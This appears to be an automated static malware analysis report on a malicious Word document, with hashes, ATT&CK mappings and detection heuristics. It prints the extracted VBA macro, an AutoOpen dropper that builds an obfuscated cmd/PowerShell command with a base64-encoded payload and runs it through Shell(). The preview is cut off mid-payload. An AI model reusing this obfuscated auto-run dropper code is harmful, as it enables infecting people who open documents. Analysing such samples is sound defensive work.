Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ec00189498b668db…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 103.0 KB
Created: 2018-06-06 06:39:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 33382ca52e69f13d9ae8d2d4926e1a2a
SHA-1: 0bf708ca53252d674e9d51a43c9bbe01cefbd6d2
SHA-256: ec00189498b668dbb44abd187b80de6e22ea79736d5793246c84b0e1ffc18484
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The file contains a VBA macro whose AutoOpen procedure calls the Shell() function, so an external command is executed automatically when the document is opened. This indicates the macro is designed to run arbitrary commands, most likely to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6574825-0' further supports this dropper functionality. No specific malware family could be identified.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6574798-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6574798-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    The VBA source contains a call to Shell()
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    The VBA project contains an AutoOpen procedure
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11375 bytes
SHA-256: 2ee270d9f7960718c953ca2fc149c31adb097c22312bea09ba7f9e6193e512bc

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ziuMCubYl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function mPDjjDmk()
On Error Resume Next
Diuml = Hex(GBzLMm + Hex(rKYjX) * 99339 + Round(wwHpaK))
JCtSvj = Cos(TEPcE)
sdiSR = CDate(nRCfHV)
hGGbEL = Cos(wwwEtR)
KXFJE = Hex(nDTSp + Hex(mWcHX) * 72078 + Round(LwtMdK))
dQviZ = Cos(zhduw)
DDwim = CDate(ljYETo)
TwGIQL = Cos(wnpXHp)
mPDjjDmk = KfIsSUPSYqX + Shell(TFZjUpY + Chr(RuLijJzspUT + vbKeyC + KIbhNo) + CGrWHtscHf + XNbIiwF + WZMXTuZ + MzwAiX + jTJBQjBtJwj + hDJrzqizz, 57795 - 57795)
QYEtiK = Hex(htPUH + Hex(risYw) * 13397 + Round(GctZM))
UXQNZW = Cos(vVHTLl)
alDqnJ = CDate(kUvRaA)
mnffhz = Cos(dRfqwJ)
End Function
Sub Autoopen()
On Error Resume Next
WWYMLc = Hex(VZCmCw + Hex(DVwwVK) * 17650 + Round(coiloz))
XApAJ = Cos(zWEPY)
QOcsi = CDate(Fawjr)
zUoujh = Cos(oiBCCw)
mPDjjDmk
nWFwr = Hex(zzsTzv + Hex(ijWWoJ) * 24390 + Round(paCnW))
khOMaw = Cos(PiUwrH)
zbUvoi = CDate(EHfNtj)
wwDLV = Cos(MSdHYz)
End Sub


Attribute VB_Name = "SABYzBjBNF"
Function CGrWHtscHf()
On Error Resume Next
KSiNN = Hex(JGsoSt + Hex(AlkQK) * 31521 + Round(hULCMB))
pAEfi = Cos(XtUFZ)
ljuVnH = CDate(YGRMZ)
PBhqGb = Cos(MKUFo)
Riolf = "md plP" + "JIwiIqinJo KjS" + "jWfIMmfwB" + "Mp" + "OtocRa" + "sZ aSNWcuBclOtb" + " &   "
nqdGQ = Hex(qSfDnz + Hex(vscOX) * 76467 + Round(jPCqDN))
ZiaMoj = Cos(TivzAh)
jkzuqi = CDate(IjwzRK)
XnnDDB = Cos(oErwS)
jwSRmihv = "  %^c^o^m^S^p^E" + "^c^%     %" + "^c" + "^o^m^" + "S^p^E^c^%     " + "/V    "
bNhOWG = Hex(AfEwMf + Hex(QuiPWW) * 5287 + Round(qIwzjR))
jGvYpF = Cos(CiaLPb)
jqqYEB = CDate(Zbbvqf)
YRZZd = Cos(wzAop)
wDsHPqEDcD = "     /" + "c         " + "  set %Zj" + "Rdi"
VrwoKH = Hex(DGRFZb + Hex(wGiTc) * 97515 + Round(YdQAml))
tmqCi = Cos(fBcmR)
PcPHMA = CDate(NKsSjL)
QwOjoY = Cos(IJUbD)
NQHsKQw = "cwjK" + "juVSbp%=jWC" + "RJfIESlj" + "sd" + "W&&set %Haoz" + "LirSU" + "Y%=p&&set " + "%R"
NkzdrC = Hex(jzIWDz + Hex(YIBUJq) * 83128 + Round(jnwwsR))
TvjJJ = Cos(dMOaiW)
Snrco = CDate(wzHzSM)
QBKhtK = Cos(ciNqu)
atDqHOuLb = "asCRowiY" + "Ajd%=o^w&&se" + "t %qnTO" + "oMXz" + "iztpbuX%" + "=EAECvOL" + "bR"
Dvwnuf = Hex(jivvT + Hex(ITHLv) * 26934 + Round(KUbCjj))
zfnaB = Cos(whDDUF)
sQlFON = CDate(BDUSSc)
fjTtGN = Cos(UDqVu)
CYWYub = "uXML" + "&&set %puEunRU" + "Ff" + "Wk%=!%Haoz" + "LirSUY%!&&" + "set %w" + "tGGopHBDn" + "cchoE%=UDOja"
LaQErp = Hex(EuiWnS + Hex(SvLVHZ) * 70666 + Round(wjJNs))
YMvkUc = Cos(anPbc)
tlAwF = CDate(PtYrVN)
Ascjv = Cos(wzfhnm)
vwzDVWp = "hinb" + "a&&set %Xv" + "FNKkK%=e^r&&" + "set " + "%jGiZjiUBlt" + "Lqw%=!"
qZrIw = Hex(fYrhzn + Hex(ZdiAU) * 49262 + Round(zbfwH))
wjBND = Cos(KmzqC)
vbiwJ = CDate(ftrET)
fNNPU = Cos(usAcz)
JDZSOM = "%RasCRowiYAj" + "d%!&&set %" + "PFFRmNJkT" + "GtLiR%=s&&se" + "t %bbszuoKomE" + "njnE" + "Q%=ANbZOaH" + "DzqJf"
WddjcR = Hex(mjkYzo + Hex(STSOc) * 84618 + Round(kiqzu))
ivJPT = Cos(jafhvQ)
cjkuoP = CDate(RwaamA)
mlunj = Cos(zuqXUF)
irJWhFOjVm = "k&&set %idTADM" + "qVb%=he&&" + "set %kbPYdH" + "kNrBVmkf%=ll&&"
CGrWHtscHf = Riolf + jwSRmihv + wDsHPqEDcD + NQHsKQw + atDqHOuLb + CYWYub + vwzDVWp + JDZSOM + irJWhFOjVm
End Function
Function XNbIiwF()
On Error Resume Next
EcmlX = Hex(BPjznB + Hex(TAlUjc) * 36357 + Round(zokuL))
ahpNai = Cos(WoJpCo)
pGlHlz = CDate(wIWor)
tHnCqM = Cos(bhqmN)
bnViF = "!%" + "puEunRUFfWk%!" + "!%jGi" + "ZjiUBltLqw%!!" + "%XvFNKkK%!!%" + "PFFR" + "mNJkTGtLiR" + "%!!%i" + "dTADMqVb%!!%"
nwMbf = Hex(oUkrCd + Hex(LSbZT) * 49445 + Round(wCPAHw))
XXHPzt = Cos(LSmjq)
DSJPl = CDate(hAzzI)
MfWlj = Cos(UhpQz)
Muibld = "kbPYdHkN" + "rBVmk" + "f%!  -e LgAgACg" + "AIAAkAHAAcwBoA" + "G8AbQBFAFsANA" + "BdACsAJABw" + "AHMASABPAG0AZQ"
bCjqzA = Hex(sdSiit + Hex(PjQqaX) * 97018 + Round(nNwalb))
JRmUj = Cos(iorAwJ)
tuAsr = CDate(vlQzqZ)
iPWuYP = Cos(fTAsJ)
wHnTwSm = "BbADMA" + "MABdACsA" + "Jw" + "BY" + "ACcAKQAgACgAbgB" + "FAFcALQBvAG" + "IAag
... (truncated)